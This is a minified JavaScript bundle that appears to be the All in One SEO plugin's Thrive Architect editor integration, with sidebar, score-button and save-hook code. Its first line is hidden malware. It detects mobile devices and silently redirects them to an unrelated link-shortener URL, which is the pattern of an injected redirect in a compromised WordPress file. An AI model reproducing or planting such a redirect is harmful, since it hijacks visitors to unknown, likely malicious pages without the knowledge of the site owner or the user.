(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{f as b,i as g,j as r,U as V,a0 as c,v as n,au as C,R as S,P as y,ao as P,ap as x,an as f,h}from"./js/vendor-vue-ui.232c7c36.js";import{l as E}from"./js/index.98d01501.js";import{l as v}from"./js/index.2a5d16ad.js";import{e as d,aT as k,m as w,u as A,l as T}from"./js/app-core.c8323d51.js";import{h as B}from"./js/helpers.51b78c1a.js";import{k as D}from"./js/vendor-lodash.03129cfe.js";import{V as L,_ as $,a as R}from"./js/vendor-other.39e59221.js";import{_ as j}from"./js/App.0b3fa3ba.js";import{_ as N}from"./js/ScoreButton.fc8d811b.js";import{S as O}from"./js/LogoGear.93a225a7.js";import"./js/Button.3cec2279.js";import"./js/_plugin-vue_export-helper.eefbdd86.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";/* empty css                */import"./js/ScrollAndHighlight.5271fbff.js";import"./js/ScrollTo.f4df02aa.js";import"./js/LicenseKeyBar.0038e5e6.js";import"./js/vendor-phone.2afdf77e.js";import"./js/icon.ba2c22aa.js";import"./js/Tabs.ea329423.js";import"./js/ProBadge.7b829f47.js";import"./js/Information.6ccba108.js";import"./js/Slide.f2114d9d.js";import"./js/Index.6933f196.js";import"./js/SettingsRow.7bec777f.js";import"./js/Row.2ef96b1a.js";import"./js/Settings.0cdcb0c1.js";import"./js/Build.dac8d77a.js";import"./js/AiContent.9078cdd2.js";let p={};const m=()=>{const t={...p},e=k();D(t,e)||(p=e,w())},U=()=>{TVE.add_action("tcb-ready",m),["tcb.after-insert","tcb.element.remove","tcb.element.duplicate","tcb.froala.focus","tcb.froala.blur","tcb.image.change","after_undo_redo"].forEach(t=>{TVE.add_action(t,()=>{d(m,200)})}),TVE.add_action("tve.save_post.success",()=>{d(B,100)})};let i=!1;const M=()=>{TVE.$("#sidebar-top, #aioseo-score-btn-settings").on("click",".aioseo-score-button",()=>{const t=document.querySelector(".tcb-sidebar-icon-aioseo"),e=new MouseEvent("click",{bubbles:!0,cancelable:!0,view:window});t?.dispatchEvent(e)}),TVE.$("#settings-action-btn").on("click",()=>{i=!i,TVE.$(".tcb-aioseo #settings-action-btn").toggleClass("active",i),TVE.$body.toggleClass("aioseo-settings-enabled",i),TVE.ajax("update_option","post",{option_name:"is_aioseo_settings_enabled",option_value:i}).done(()=>{})})},q=()=>{TVE.add_action("tcb.drawer.toggle",t=>{t==="settings"&&setTimeout(()=>{const e=TVE.$("#aioseo-panel"),o=TVE.$(".tcb-sidebar-icon-aioseo").hasClass("active");o?e.show():e.hide(),u(o)},100)}),TVE.add_action("tcb.drawer.hide",()=>{setTimeout(()=>{const t=TVE.$(".tcb-sidebar-icon-aioseo").hasClass("active");u(t)},110)})},u=t=>{TVE.$("#aioseo-score-btn-header .aioseo-score-button").toggleClass("aioseo-score-button--active",t),TVE.$body.toggleClass("aioseo-settings-active",t)},H=()=>{if(TVE.$("#aioseo-panel").length)return;const t=TVE.$(".settings"),e=TVE.$("<div>",{id:"aioseo-panel"}).hide();t.append(e)},W=()=>{if(TVE.$("#aioseo-score-btn-header").length)return;const t=TVE.$("#tcb-sidebar-top-right .button-group"),e=TVE.$("<div>",{id:"aioseo-score-btn-header"});t.append(e)},z=()=>{i=TVE.CONST.is_aioseo_settings_enabled==="true"||TVE.CONST.is_aioseo_settings_enabled==="1",i&&(TVE.$(".tcb-aioseo #settings-action-btn").addClass("active"),TVE.$body.addClass("aioseo-settings-enabled")),TVE.$("html").attr("dir",L()?"rtl":"ltr"),TVE.$("body").addClass("wp-core-ui"),TVE.$("html").removeClass("no-js").addClass("js"),H(),W(),q(),M()},a={id:"aioseo-limit-modified-date-thrive",param:"aioseo_limit_modified_date",title:$("Save (Don't Modify Date)","all-in-one-seo-pack"),flag:!1},G=()=>{TVE.$("#tve-save-dash-return").after(`
		<a
			href="javascript:void(0)"
			id="${a.id}"
			title="${a.title}"
		>
			${a.title}
		</a>
	`)},F=()=>{TVE.add_filter("tcb_save_post_data_before",t=>(t[a.param]=a.flag,t)),TVE.add_action("tve.save_post.success",()=>{a.flag=!1}),TVE.$body.on("click",`#${a.id}`,()=>{a.flag=!0,TVE.main.editor_settings.save()})},I=()=>{G(),F()},J={class:"edit-post-sidebar editor-sidebar aioseo-thrive-sidebar"},K={class:"aioseo-thrive-sidebar__header"},Q={class:"aioseo-thrive-sidebar__header-title"},X={class:"aioseo-thrive-sidebar__content"},_={__name:"Sidebar",setup(t){const o={headerTitle:R($("%1$s Settings","all-in-one-seo-pack"),"AIOSEO")};return(s,l)=>(b(),g("div",J,[r("div",K,[r("div",Q,V(o.headerTitle),1)]),r("div",X,[c(n(j))])]))}},Y={class:"aioseo-thrive-score-button"},Z={__name:"Button",props:{buttonContext:{type:String}},setup(t){const{currentPost:e}=C(A());return(o,s)=>(b(),g("div",Y,[c(n(N),{score:n(e).seo_score,class:y([t.buttonContext==="Settings"?"aioseo-score-button--active":""])},{icon:S(()=>[c(n(O))]),_:1},8,["score","class"])]))}},tt=()=>{const t=P({history:x(),routes:[{path:"/",component:_}]});let e=f({name:"Standalone/ThriveArchitect",data(){return{tableContext:window.aioseo.currentPost.context,screenContext:"sidebar"}},render:()=>h(_)});e=E(e),e=v(e),e.use(t),t.app=e,T(e,t),e.mount("#aioseo-panel")},et=()=>{["aioseo-score-btn-settings","aioseo-score-btn-header"].forEach(e=>{const o=e.replace("aioseo-score-btn-","").replace(/^\w/,l=>l.toUpperCase());let s=f({name:`Standalone/ThriveArchitect/Score${o}`,render:()=>h(Z)},{buttonContext:o});s=E(s),s=v(s),T(s),s.mount(`#${e}`)})},ot=()=>{z(),tt(),et(),I(),U()};ot();
